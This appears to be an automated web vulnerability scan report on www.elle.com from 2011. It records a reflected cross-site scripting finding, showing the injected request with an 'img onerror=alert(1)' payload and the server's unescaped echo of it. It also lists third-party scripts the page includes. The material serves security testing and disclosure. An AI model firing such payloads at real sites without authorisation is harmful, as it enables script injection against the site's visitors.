1. Cross-site scripting (reflected)
2. Cross-domain script include
Severity: | High |
Confidence: | Certain |
Host: | http://www.elle.com |
Path: | /Beauty/Hair/The-Best |
GET /Beautya3b87--><img%20src%3da Host: www.elle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) DAV/2 PHP/5.2.12 SVN/1.5.5 X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Wed, 26 Oct 2011 18:25:50 GMT Served-by: www.elle.com Content-Language: en-US Status: 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, must-revalidate Expires: Wed, 26 Oct 2011 18:25:52 GMT Date: Wed, 26 Oct 2011 18:25:52 GMT Connection: close Connection: Transfer-Encoding Content-Length: 46455 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <!-- Path: /beautya3b87--><img src=a onerror=alert(1) ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.elle.com |
Path: | /Beauty/Hair/The-Best |
GET /Beauty/Hair/The-Best Host: www.elle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) DAV/2 PHP/5.2.12 SVN/1.5.5 X-Powered-By: PHP/5.2.12 Content-Type: text/html; charset=utf-8 Date: Wed, 26 Oct 2011 18:24:40 GMT Connection: close Connection: Transfer-Encoding X-N: S Content-Length: 75372 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <meta property="fb:page_id" content="31911516300" /> <script type="text/javascript" src="http://ajax ...[SNIP]... </script><script language="JavaScript" type="text/javascript" src="http://hfm.checkm8 ...[SNIP]... </a> <script type="text/javascript" src="http://platform ...[SNIP]... </ul> <script type="text/javascript" src="http://w.sharethis ...[SNIP]... <span class="alignleft"> <script src="http://cdn.gigya.com ...[SNIP]... <div id="smarttout"> <script src="http://ads ...[SNIP]... <div class="ad-300x80" style="margin-bottom: 10px;"> <script src="http://ads ...[SNIP]... |